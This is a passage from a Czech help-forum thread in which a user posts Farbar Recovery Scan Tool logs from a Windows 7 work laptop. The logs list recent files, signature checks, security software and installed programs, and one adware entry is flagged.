2017-03-20 08:35 - 2017-02-09 18:14 - 00215040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icm32.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00082944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcrypt.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:03 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2017-03-20 08:35 - 2017-02-09 18:03 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2017-03-20 08:35 - 2017-02-09 18:03 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2017-03-20 08:35 - 2017-02-09 18:02 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2017-03-20 08:35 - 2017-02-09 18:00 - 03220480 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2017-03-20 08:35 - 2017-02-09 17:59 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2017-03-20 08:35 - 2017-02-09 17:58 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2017-03-20 08:35 - 2017-02-09 17:55 - 00291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2017-03-20 08:35 - 2017-02-09 17:55 - 00159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2017-03-20 08:35 - 2017-02-09 17:55 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2017-03-20 08:35 - 2017-02-09 17:54 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2017-03-20 08:35 - 2017-02-09 17:54 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2017-03-20 08:35 - 2017-02-09 17:53 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2017-03-20 08:35 - 2017-02-09 17:51 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WcsPlugInService.dll
2017-03-20 08:35 - 2017-02-09 17:50 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2017-03-20 08:35 - 2017-02-09 17:50 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2017-03-20 08:35 - 2017-02-09 17:50 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2017-03-20 08:35 - 2017-02-09 17:50 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2017-03-20 08:35 - 2017-02-09 17:49 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2017-03-20 08:35 - 2017-02-09 17:49 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 17:49 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 17:49 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 17:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 16:06 - 01648128 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2017-03-20 08:35 - 2017-02-09 16:06 - 01180160 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2017-03-20 08:35 - 2017-02-06 18:14 - 00733696 _____ (Microsoft Corporation) C:\Windows\HelpPane.exe
2017-03-20 08:35 - 2017-01-24 10:36 - 00002131 _____ C:\Users\Administrator.CEDA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft OneDrive.lnk
2017-03-20 08:35 - 2017-01-13 20:00 - 00976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2017-03-20 08:35 - 2017-01-13 20:00 - 00084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll
2017-03-20 08:35 - 2017-01-13 19:45 - 00741888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2017-03-20 08:35 - 2017-01-13 19:45 - 00084480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\INETRES.dll
2017-03-20 08:35 - 2017-01-11 20:01 - 01887744 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2017-03-20 08:35 - 2017-01-11 20:01 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\msxml3r.dll
2017-03-20 08:35 - 2017-01-11 19:43 - 01241088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
2017-03-20 08:35 - 2017-01-11 19:43 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3r.dll
2017-03-20 08:35 - 2017-01-06 20:00 - 01574912 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2017-03-20 08:35 - 2017-01-06 19:44 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2017-03-20 08:35 - 2016-12-31 17:36 - 00556544 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2017-03-20 08:35 - 2016-12-31 17:36 - 00335360 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2017-03-20 08:35 - 2016-12-31 17:36 - 00293376 _____ (Microsoft Corporation) C:\Windows\system32\centel.dll
2017-03-20 08:35 - 2016-12-31 17:36 - 00233984 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2017-03-20 08:35 - 2016-12-31 17:36 - 00133632 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2017-03-20 08:35 - 2015-06-10 14:10 - 00000000 ____D C:\Users\Administrator.CEDA\AppData\Roaming\Media Center Programs
2017-03-20 08:35 - 2015-04-03 11:33 - 00000000 ___HD C:\Users\Administrator.CEDA\Documents\hp.system.package.metadata
2017-03-20 08:35 - 2015-04-03 11:33 - 00000000 ___HD C:\Users\Administrator.CEDA\Documents\hp.applications.package.appdata
2017-03-20 08:33 - 2017-03-20 08:33 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\Intel Corporation
2017-03-20 08:32 - 2017-04-09 20:51 - 00000000 ____D C:\Users\Tesla\AppData\Local\Google
2017-03-20 08:32 - 2017-04-08 19:01 - 00159392 _____ C:\Users\Tesla\AppData\Local\GDIPFONTCACHEV1.DAT
2017-03-20 08:32 - 2017-03-31 16:02 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\Adobe
2017-03-20 08:32 - 2017-03-20 08:32 - 00001400 _____ C:\Users\Tesla\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2017-03-20 08:32 - 2017-03-20 08:32 - 00000000 ____D C:\Users\Tesla\Documents\Moje přijaté soubory
2017-03-20 08:32 - 2017-03-20 08:32 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\hpqLog
2017-03-20 08:32 - 2017-03-20 08:32 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\Hewlett-Packard
2017-03-20 08:31 - 2017-04-09 21:00 - 00000000 __SHD C:\Users\Tesla\IntelGraphicsProfiles
2017-03-20 08:31 - 2017-04-09 11:37 - 00000000 ____D C:\Users\Tesla\AppData\Local\DigitalPersona
2017-03-20 08:31 - 2017-04-03 13:22 - 00000000 ____D C:\Users\Tesla
2017-03-20 08:31 - 2017-03-20 08:31 - 00000020 ___SH C:\Users\Tesla\ntuser.ini
2017-03-20 08:31 - 2017-03-20 08:31 - 00000000 _SHDL C:\Users\Tesla\Šablony
2017-03-20 08:31 - 2017-03-20 08:31 - 00000000 _SHDL C:\Users\Tesla\Soubory cookie
2017-03-20 08:31 - 2017-03-20 08:31 - 00000000 _SHDL C:\Users\Tesla\Poslední
2017-03-20 08:31 - 2017-03-20 08:31 - 00000000 _SHDL C:\Users\Tesla\Okolní tiskárny
2017-03-20 08:31 - 2017-03-20 08:31 - 00000000 _SHDL C:\Users\Tesla\Okolní síť
2017-03-20 08:31 - 2017-03-20 08:31 - 00000000 _SHDL C:\Users\Tesla\Nabídka Start
2017-03-20 08:31 - 2017-03-20 08:31 - 00000000 _SHDL C:\Users\Tesla\Dokumenty
2017-03-20 08:31 - 2017-03-20 08:31 - 00000000 _SHDL C:\Users\Tesla\Documents\Obrázky
2017-03-20 08:31 - 2017-03-20 08:31 - 00000000 _SHDL C:\Users\Tesla\Documents\Hudba
2017-03-20 08:31 - 2017-03-20 08:31 - 00000000 _SHDL C:\Users\Tesla\Documents\Filmy
2017-03-20 08:31 - 2017-03-20 08:31 - 00000000 _SHDL C:\Users\Tesla\Data aplikací
2017-03-20 08:31 - 2017-03-20 08:31 - 00000000 _SHDL C:\Users\Tesla\AppData\Roaming\Microsoft\Windows\Start Menu\Programy
2017-03-20 08:31 - 2017-03-20 08:31 - 00000000 _SHDL C:\Users\Tesla\AppData\Local\Data aplikací
2017-03-20 08:31 - 2017-03-20 08:31 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\Intel
2017-03-20 08:31 - 2017-03-20 08:31 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\DigitalPersona
2017-03-20 08:31 - 2017-03-20 08:31 - 00000000 ____D C:\Users\Tesla\AppData\Local\VirtualStore
2017-03-20 08:31 - 2017-01-24 10:36 - 00002131 _____ C:\Users\Tesla\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft OneDrive.lnk
2017-03-20 08:31 - 2015-06-10 14:10 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\Media Center Programs
2017-03-20 08:31 - 2015-04-03 11:33 - 00000000 ___HD C:\Users\Tesla\Documents\hp.system.package.metadata
2017-03-20 08:31 - 2015-04-03 11:33 - 00000000 ___HD C:\Users\Tesla\Documents\hp.applications.package.appdata

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-04-09 21:04 - 2017-01-26 09:43 - 00146942 _____ C:\Windows\system32\Drivers\fvstore.dat
2017-04-09 21:01 - 2017-02-13 14:31 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-04-09 21:00 - 2017-01-23 16:44 - 00000180 _____ C:\Windows\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2017-04-09 20:59 - 2009-07-14 07:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-04-09 20:59 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\inf
2017-04-09 20:58 - 2017-01-24 10:57 - 01474832 _____ C:\Windows\system32\Drivers\sfi.dat
2017-04-09 20:57 - 2009-07-14 06:45 - 00031536 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-04-09 20:57 - 2009-07-14 06:45 - 00031536 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-04-09 20:56 - 2015-06-10 14:20 - 00668488 _____ C:\Windows\system32\perfh005.dat
2017-04-09 20:56 - 2015-06-10 14:20 - 00141082 _____ C:\Windows\system32\perfc005.dat
2017-04-09 20:56 - 2009-07-14 07:13 - 01581870 _____ C:\Windows\system32\PerfStringBackup.INI
2017-04-09 20:53 - 2017-02-02 09:38 - 00000000 ____D C:\Program Files (x86)\Google
2017-04-08 18:56 - 2009-07-14 06:45 - 00566144 _____ C:\Windows\system32\FNTCACHE.DAT
2017-04-08 17:42 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\system32\NDF
2017-04-07 14:43 - 2017-01-30 18:04 - 00000112 _____ C:\Windows\system32\config\netlogon.ftl
2017-04-05 16:37 - 2013-12-03 21:29 - 00000000 ____D C:\Windows\Panther
2017-04-05 08:01 - 2016-12-28 01:20 - 00051808 _____ (COMODO) C:\Windows\system32\cmdcsr.dll
2017-04-05 08:01 - 2016-12-28 01:19 - 00732368 _____ (COMODO) C:\Windows\SysWOW64\guard32.dll
2017-04-05 08:00 - 2016-12-28 01:19 - 00941768 _____ (COMODO) C:\Windows\system32\guard64.dll
2017-04-05 07:58 - 2016-12-28 01:17 - 00457408 _____ (COMODO) C:\Windows\system32\cmdvrt64.dll
2017-04-05 07:58 - 2016-12-28 01:17 - 00230592 _____ (COMODO) C:\Windows\system32\cmdshim64.dll
2017-04-05 07:56 - 2016-12-28 01:15 - 00363200 _____ (COMODO) C:\Windows\SysWOW64\cmdvrt32.dll
2017-04-05 07:56 - 2016-12-28 01:15 - 00194752 _____ (COMODO) C:\Windows\SysWOW64\cmdshim32.dll
2017-04-04 11:43 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\rescache
2017-04-04 08:19 - 2017-01-30 18:05 - 00002958 __RSH C:\ProgramData\ntuser.pol
2017-04-03 16:27 - 2015-06-10 13:35 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
2017-04-03 16:03 - 2015-06-10 13:40 - 00000000 ____D C:\ProgramData\Skype
2017-04-03 16:03 - 2013-12-03 21:34 - 00000000 ____D C:\ProgramData\Package Cache
2017-04-03 15:58 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\PolicyDefinitions
2017-04-03 09:28 - 2015-06-10 13:35 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-03-28 22:33 - 2016-12-28 01:22 - 00848736 _____ (COMODO) C:\Windows\system32\Drivers\cmdguard.sys
2017-03-28 22:33 - 2016-12-28 01:22 - 00119392 _____ (COMODO) C:\Windows\system32\Drivers\inspect.sys
2017-03-28 22:33 - 2016-12-28 01:22 - 00057504 _____ (COMODO) C:\Windows\system32\Drivers\cmdhlp.sys
2017-03-28 22:33 - 2016-12-28 01:21 - 00031664 _____ (COMODO) C:\Windows\system32\Drivers\cmderd.sys
2017-03-20 12:24 - 2017-01-24 09:49 - 00000000 ____D C:\Program Files (x86)\ArcGIS
2017-03-20 08:48 - 2017-01-24 08:57 - 00000000 ___SD C:\Windows\system32\CompatTel
2017-03-20 08:48 - 2017-01-24 08:57 - 00000000 ____D C:\Windows\system32\appraiser
2017-03-20 08:48 - 2017-01-23 17:30 - 00000000 ____D C:\Windows\system32\MRT
2017-03-20 08:48 - 2009-07-14 07:32 - 00000000 ____D C:\Program Files\DVD Maker
2017-03-20 08:46 - 2017-01-23 17:30 - 138634176 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2017-03-20 08:39 - 2017-01-24 10:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FreeCommander XE
2017-03-20 08:39 - 2017-01-24 10:54 - 00000000 ____D C:\Program Files (x86)\FreeCommander XE

==================== Files in the root of some directories =======

2015-06-10 13:34 - 2015-06-10 13:35 - 8950670 _____ () C:\ProgramData\hpcsmmsilogs.log
2015-06-10 13:45 - 2015-06-10 13:45 - 1262914 _____ () C:\ProgramData\hpdam_install_log.txt
2015-06-10 13:45 - 2015-06-10 13:45 - 0544572 _____ () C:\ProgramData\HPFileSanitizer_Install_Log.txt

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-04-03 10:13

==================== End of FRST.txt ============================
Nahoru
Tesla
Vzorný návštěvník
Vzorný návštěvník
Příspěvky: 94
Registrován: 02 pro 2005 17:10
Bydliště: Praha

Re: Kontrola, pracovní NTB

#2 Příspěvek od Tesla »

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 15-03-2017
Ran by tesla (09-04-2017 21:06:00)
Running from C:\Users\Tesla\Desktop
Windows 7 Professional Service Pack 1 (X64) (2017-01-23 14:44:20)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-371995700-114725131-3374930871-500 - Administrator - Disabled)
Guest (S-1-5-21-371995700-114725131-3374930871-501 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: COMODO Antivirus (Enabled - Up to date) {0C515E80-E355-69BD-3445-A511E5C186FD}
AS: COMODO Advanced Protection (Enabled - Up to date) {B730BF64-C56F-6633-0EF5-9E639E46CC40}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

7-Zip 16.04 (x64) (HKLM\...\7-Zip) (Version: 16.04 - Igor Pavlov)
Adobe Acrobat Reader DC - Czech (HKLM-x32\...\{AC76BA86-7AD7-1029-7B44-AC0F074E4100}) (Version: 15.023.20070 - Adobe Systems Incorporated)
BitTorrent (HKU\S-1-5-21-3530450637-73980329-3277372514-2116\...\BitTorrent) (Version: 7.10.0.43581 - BitTorrent Inc.)
Blizzard App (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.28 - Piriform)
COMODO Internet Security Premium (HKLM\...\COMODO Internet Security) (Version: 10.0.1.6209 - COMODO Security Solutions Inc.)
COMODO Internet Security Premium (Version: 10.0.1.6209 - COMODO Security Solutions Inc.) Hidden
CyberLink PowerDVD 12 (HKLM-x32\...\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}) (Version: 12.0.3.3920 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 4.2.1.4513 - CyberLink Corp.)
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.5.1.0230 - Disc Soft Ltd)
Dropbox (HKLM-x32\...\Dropbox) (Version: 23.4.18 - Dropbox, Inc.)
Dropbox Update Helper (x32 Version: 1.3.65.1 - Dropbox, Inc.) Hidden
Energy Star (HKLM-x32\...\{FC0ADA4D-8FA5-4452-8AFF-F0A0BAC97EF7}) (Version: 1.0.9 - Hewlett-Packard Company)
Foxit PhantomPDF (HKLM-x32\...\{5F3E0897-97AA-4FC2-A0A9-130A39D0FDFB}) (Version: 6.0.16.324 - Foxit Corporation)
FreeCommander XE (HKLM-x32\...\FreeCommander XE_is1) (Version: - Marek Jasinski)
GIMP 2.8.20 (HKLM\...\GIMP-2_is1) (Version: 2.8.20 - The GIMP Team)
Google Earth (HKLM-x32\...\{F6430171-B86B-4639-839E-374913E7911D}) (Version: 7.1.8.3036 - Google)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 57.0.2987.133 - Google Inc.)
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
Hearthstone (HKLM-x32\...\Hearthstone) (Version: - Blizzard Entertainment)
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version: - Blizzard Entertainment)
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
HP 3D DriveGuard (HKLM-x32\...\{13133E99-B0D5-4143-B832-AAD55C62A41C}) (Version: 6.0.19.1 - Hewlett-Packard Company)
HP Camera Driver (HKLM-x32\...\Sunplus SPUVCb) (Version: 3.4.8.48 - SunplusIT)
HP Client Security Manager (HKLM\...\HPProtectTools) (Version: 8.3.7.1864 - Hewlett-Packard Company)
HP Connection Manager (HKLM-x32\...\{C0ED9561-8312-457C-BB1B-BDC7EE034CED}) (Version: 4.7.4.1 - Hewlett-Packard Company)
HP Device Access Manager (HKLM\...\{DBE16A07-DDFF-4453-807A-212EF93916E0}) (Version: 8.3.2.0 - Hewlett-Packard Company)
HP Documentation (HKLM-x32\...\{AD7280A3-19D9-4D3F-B5EC-2D0DD0443698}) (Version: 1.1.0.0 - Hewlett-Packard)
HP Drive Encryption (HKLM\...\HPDriveEncryption) (Version: 8.6.13.12 - Hewlett-Packard Company)
HP ESU for Microsoft Windows 7 (HKLM-x32\...\{56C60843-5199-47F1-9087-AE440EFFB951}) (Version: 2.5.1 - Hewlett-Packard Company)
HP File Sanitizer (HKLM-x32\...\{6349342F-9CEF-4A70-995A-2CF3704C2603}) (Version: 8.4.20.1 - Hewlett-Packard Company)
HP Hotkey Support (HKLM-x32\...\{445CC807-9384-47FA-A2B6-FFE970352B88}) (Version: 6.0.22.1 - Hewlett-Packard Company)
HP PageLift (HKLM-x32\...\{59202086-BEA1-411A-8AA4-A5DCD28FF537}) (Version: 1.0.13.1 - Hewlett-Packard Company)
HP Setup (HKLM-x32\...\{438363A8-F486-4C37-834C-4955773CB3D3}) (Version: 9.1.15453.4066 - Hewlett-Packard Company)
HP SoftPaq Download Manager (HKLM-x32\...\{34FF930E-DBF9-4858-BAB5-BAC957BF616E}) (Version: 3.5.1.0 - Hewlett-Packard Company)
HP Software Setup (HKLM-x32\...\{F6D61EC9-347B-4019-9F8E-E24169F7C330}) (Version: 8.7.5 - Hewlett-Packard Company)
HP Support Assistant (HKLM-x32\...\{904822F1-6C7D-4B91-B936-6A1C0810544C}) (Version: 7.7.34.34 - Hewlett-Packard Company)
HP Support Information (HKLM-x32\...\{B2B7B1C8-7C8B-476C-BE2C-049731C55992}) (Version: 13.00.0000 - Hewlett-Packard)
HP System Default Settings (HKLM-x32\...\{B5BEF5F8-BD76-4174-A47D-05A06EA62615}) (Version: 2.7.1 - Hewlett-Packard Company)
HP Theft Recovery (HKLM-x32\...\InstallShield_{B1E569B6-A5EB-4C97-9F93-9ED2AA99AF0E}) (Version: 8.3.0.7 - Hewlett-Packard Company)
initialpage123 - Uninstall (HKLM-x32\...\{234AC151-AFED-40DC-BA3E-22E7414440F1}) (Version: - ) <==== ATTENTION
Intel(R) Chipset Device Software (x32 Version: 10.0.22 - Intel(R) Corporation) Hidden
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 10.0.30.1072 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.15.4268 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 13.2.0.1016 - Intel Corporation)
Intel(R) Smart Connect Technology (HKLM\...\{CAB8255F-E9B7-4EFC-9C9B-2D3A4C954294}) (Version: 5.0.10.2861 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 3.0.1.41 - Intel Corporation)
Intel(R) WiDi (HKLM\...\{2F97FBC6-7992-4DF7-A7C7-B68455E307F7}) (Version: 5.1.20.0 - Intel Corporation)
Intel(R) Wireless Bluetooth(R)(patch version 17.1.1434.2) (HKLM\...\{302600C1-6BDF-4FD1-1407-148929CC1385}) (Version: 17.1.1407.0480 - Intel Corporation)
Intel® PROSet/Wireless Software (HKLM-x32\...\{e63d3cb3-0b4d-44ca-aba0-ba433f2f37fd}) (Version: 17.13.0 - Intel Corporation)
IrfanView 4.44 (64-bit) (HKLM\...\IrfanView64) (Version: 4.44 - Irfan Skiljan)
Java 8 Update 121 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180121F0}) (Version: 8.0.1210.13 - Oracle Corporation)
Last.fm Scrobbler 2.1.37 (HKLM-x32\...\LastFM_is1) (Version: - Last.fm)
